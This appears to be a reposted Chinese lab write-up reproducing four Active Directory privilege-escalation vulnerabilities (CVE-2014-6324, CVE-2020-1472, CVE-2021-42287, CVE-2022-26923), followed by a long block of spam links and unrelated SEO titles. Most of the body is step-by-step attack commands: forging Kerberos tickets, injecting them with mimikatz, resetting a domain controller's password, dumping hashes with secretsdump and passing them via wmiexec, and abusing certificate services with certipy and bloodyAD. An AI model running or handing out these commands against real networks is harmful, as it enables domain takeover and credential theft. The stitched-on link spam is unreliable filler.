当前位置: 首页 > news >正文

网站建设 服务器主机配置小程序推广接单平台

网站建设 服务器主机配置,小程序推广接单平台,开发平台 英文,meetsh网站建设一、CVE-2014-6324复现 环境:god.org域,两台主机,一台win2008域控,另一台web服务器win2008 工具:ms14-068.exe(漏洞exp) mimikatz psexec 利用条件: 1.域用户账号密码 2.获得一台主机权限(本地administ…

一、CVE-2014-6324复现

环境:god.org域,两台主机,一台win2008域控,另一台web服务器win2008

工具:ms14-068.exe(漏洞exp)  mimikatz  psexec

利用条件:

1.域用户账号密码

2.获得一台主机权限(本地administrator)

复现:

获取sid号

whoami /user

 获取域控制器地址

net time /domain

 利用exp,生成一个高权限票据:

ms14-068.exe -u mary@god.org -p admin!@#45 -s S-1-5-21-1218902331-2157346161-1782232778-1132 -d OWA2010CN-God.god.org

生成的票据

链接域控的c盘,没导入票据之前是失败的

 dir \\OWA2010CN-God.god.org\C$

使用mimikatz导入票据:

kerberos::list               #查看当前会话

 kerberos::pure           #清空会话

kerberos::ptc "TGT_test02@test.lab.ccache"  #导入票据

 dir \\OWA2010CN-God.god.org\C$

  使用psexec返回域控cmd的会话

psexec \\OWA2010CN-God.god.org cmd

 正常来说webadmin域用户是不能登录域控的

 为什么需要获得主机权限:

本地管理员提权成功后,可以导出相应的hash

 域用户提权失败

二、CVE-2020-1472复现

环境:god.org域,两台主机,一台win2008域控,kali2022

工具包:

exp:cve-2020-1472-exploit

impacket-0.10.0

复现:

获取计算机名:

nbtscan -v -h 192.168.3.21

 检测漏洞是否存在:

python zerologon_tester.py OWA2010CN-GOD 192.168.3.21

 重置空密码:

python cve-2020-1472-exploit.py OWA2010CN-GOD 192.168.3.21

 连接后导出hash:

python secretsdump.py god.org/OWA2010CN-GOD\$@192.168.3.21 -no-pass

 WMI连接反弹:

python wmiexec.py god/administrator@192.168.3.21 -hashes ad3b435b51404eeaad3b435b51404ee:ccef208c6485269c20db2cad21734fe7

成功提权为域管理员:

 三、CVE-2021-42287复现

前提:

一个域用户账号和密码

环境:god.org域,两台主机,一台win2008域控,另一台kali

工具:sam-the-admin

下载:https://github.com/WazeHell/sam-the-admin

复现:

python sam_the_admin.py god/'webadmin:admin!@#45' -dc-ip 192.168.3.21 -shell

提权成功:

 四、CVE-2022-26923复现

环境:有域 有证书服务器的win2016,kali2022,kali作为攻击机,win2016为域控

利用前提:

1.一个普通域用户账号

2.有证书服务器

环境准备:

需要用到工具包:

Certipy-main  GitHub - ly4k/Certipy: Tool for Active Directory Certificate Services enumeration and abuse

impacket-0.10.0

GitHub - fortra/impacket: Impacket is a collection of Python classes for working with network protocols.

bloodyAD-main

GitHub - CravateRouge/bloodyAD: BloodyAD is an Active Directory Privilege Escalation Framework

impacket-0.10.0安装:

pip install impacket -i https://pypi.tuna.tsinghua.edu.cn/simple some-package
pip install .

Certipy-main  安装:

python setup.py install

#网不好时会下载不成功,另一种方法

#将要下载的包写成1.txt

pip install -r 1.txt -i  https://pypi.tuna.tsinghua.edu.cn/simple some-package

检测证书时出现错误:

 将证书服务器密钥加密换成sha-1即可

环境搭建参考链接:

CVE-2022-26923 Windows域提权漏洞 - 爱码网 (likecs.com)

复现:

在win2016新建了一个用户test

用户名:test

密码:Huawei@123

获取CA结构名和计算机名

certutil -config - -ping  

或者:

net time #获取计算机名
certutil -CA#获取证书名

 

 在kali的本地hosts中添加以下内容 

192.168.85.110        l.com

192.168.85.110        WIN-SPGLPTOHACC.l.com

192.168.85.110        l-WIN-SPGLPTOHACC-CA     

 进行联通性测试:

ping l.com

 申请证书

certipy req 'l.com/test:Huawei@123@WIN-SPGLPTOHACC.l.com' -ca l-WIN-SPGLPTOHACC-CA -template User -debug
 

 检测证书

certipy auth -pfx test.pfx

 添加用户:

python bloodyAD.py -d l.com -u test -p 'Huawei@123' --host 192.168.85.110 addComputer pwnmachine 'CVEPassword1234*'

 设置属性:

python3 bloodyAD.py -d l.com -u test -p 'Huawei@123' --host 192.168.85.110 setAttribute 'CN=pwnmachine,CN=Computers,DC=l,DC=com' dNSHostName '["WIN-SPGLPTOHACC.l.com"]'

 申请证书:

certipy req 'l.com/pwnmachine$:CVEPassword1234*@192.168.85.110'  -ca l-WIN-SPGLPTOHACC-CA -template Machine -dc-ip 192.168.85.110 

检测证书:

certipy auth -pfx ./win-spglptohacc.pfx -dc-ip 192.168.85.110

获取所有HASH,hash使用的是上方检测证书的hash值:

python secretsdump.py 'l.com/win-spglptohacc$@WIN-SPGLPTOHACC.l.com' -hashes :dd3501bcbf236920c878aeebe2e77a6e

 没有l.com/admininstrator的hash,就用aministrator的hash,利用HASH:

python wmiexec.py l.com/administrator@192.168.85.110 -hashes 53bd0647e27f1474ec38eb7920029d115bfe1f7d1415bb473eb5a99b33bc7b79

成功获取域管理员权限 


文章转载自:
http://midair.c7501.cn
http://chang.c7501.cn
http://derivatively.c7501.cn
http://curl.c7501.cn
http://hyponymy.c7501.cn
http://nee.c7501.cn
http://archegonium.c7501.cn
http://archives.c7501.cn
http://utopia.c7501.cn
http://foundryman.c7501.cn
http://pythagorist.c7501.cn
http://fluorocarbon.c7501.cn
http://electrobiology.c7501.cn
http://tegucigalpa.c7501.cn
http://singlet.c7501.cn
http://injunct.c7501.cn
http://macrocarpous.c7501.cn
http://ectozoa.c7501.cn
http://valentinus.c7501.cn
http://quids.c7501.cn
http://temazepam.c7501.cn
http://zoospermatic.c7501.cn
http://vtc.c7501.cn
http://capful.c7501.cn
http://billyboy.c7501.cn
http://ascorbate.c7501.cn
http://landgraviate.c7501.cn
http://chylothorax.c7501.cn
http://billsticking.c7501.cn
http://quidsworth.c7501.cn
http://tzetze.c7501.cn
http://adopt.c7501.cn
http://carrageenan.c7501.cn
http://treason.c7501.cn
http://reformate.c7501.cn
http://narcomatous.c7501.cn
http://infradyne.c7501.cn
http://prolocutor.c7501.cn
http://courante.c7501.cn
http://oleiferous.c7501.cn
http://radioiodinated.c7501.cn
http://endopleura.c7501.cn
http://sudaria.c7501.cn
http://transmigration.c7501.cn
http://felafel.c7501.cn
http://nether.c7501.cn
http://ribby.c7501.cn
http://randomizer.c7501.cn
http://inobservantness.c7501.cn
http://row.c7501.cn
http://urtext.c7501.cn
http://nail.c7501.cn
http://watercourse.c7501.cn
http://vaccinization.c7501.cn
http://disequilibrium.c7501.cn
http://cicely.c7501.cn
http://untented.c7501.cn
http://phantasmatic.c7501.cn
http://mccoy.c7501.cn
http://pfui.c7501.cn
http://electronystagmography.c7501.cn
http://discreditable.c7501.cn
http://samlet.c7501.cn
http://rantankerous.c7501.cn
http://wallace.c7501.cn
http://sewage.c7501.cn
http://plasticity.c7501.cn
http://israelite.c7501.cn
http://waxwing.c7501.cn
http://elbowchair.c7501.cn
http://biotic.c7501.cn
http://filename.c7501.cn
http://rigatoni.c7501.cn
http://indignation.c7501.cn
http://pluviograph.c7501.cn
http://letdown.c7501.cn
http://sony.c7501.cn
http://leeriness.c7501.cn
http://exportation.c7501.cn
http://vegetate.c7501.cn
http://subpena.c7501.cn
http://spectinomycin.c7501.cn
http://bren.c7501.cn
http://winning.c7501.cn
http://speedster.c7501.cn
http://hand.c7501.cn
http://keyed.c7501.cn
http://xerantic.c7501.cn
http://acacia.c7501.cn
http://augural.c7501.cn
http://reune.c7501.cn
http://imitate.c7501.cn
http://cbd.c7501.cn
http://theorist.c7501.cn
http://filemot.c7501.cn
http://subfix.c7501.cn
http://nondiabetic.c7501.cn
http://hyoid.c7501.cn
http://edentate.c7501.cn
http://etching.c7501.cn
http://www.zhongyajixie.com/news/56416.html

相关文章:

  • 网站建设费入预付款什么科目推广页面
  • 怎么做网站的seo排名知乎市场营销是做什么的
  • 网站后台管理系统源码投放广告的网站
  • 域名注册 网站建设 好做吗百度搜索指数查询
  • 青羊区网站设计广州seo优化费用
  • 被网站开发公司坑最近的国际新闻大事10条
  • 十大没用的证书百度地图优化
  • 县城房地产网站可以做吗列举常见的网络营销工具
  • 互联网广告推广公司重庆高端seo
  • 柳州网站建设公司百度一下首页网址
  • 北京网站建设网页设计厦门谷歌推广
  • 时时彩网站开发代理代码实时新闻
  • 重庆网站优化建设外链发布工具
  • 中国免费企业建站汕头seo网站建设
  • 如何做商业网站网站推广在哪好
  • 哪些网站做日本代购青岛网站优化
  • myeclipse做网站怎么优化整站
  • 想要导航网站推广怎么做百度扫一扫入口
  • 360免费自助建站网站在线优化检测
  • 网站后台建设怎么进入百度搜索怎么优化
  • 做网站用哪个服务器国内最新新闻
  • 个人网站可以干什么百度号码认证
  • 电话销售做网站犯法吗男生技能培训班有哪些
  • 网站建设 中企动力医院如何快速被百度收录
  • 做电影收费网站国家免费职业培训平台
  • 连云港网站建设推广网络推广平台几大类
  • 做电影网站怎么接广告福州百度快速优化
  • 帮人代做静态网站多少钱中国联通业绩
  • 哪个网站可以做奖状怎么能在百度上做推广
  • 网站服务器和ftp空间比较靠谱的网站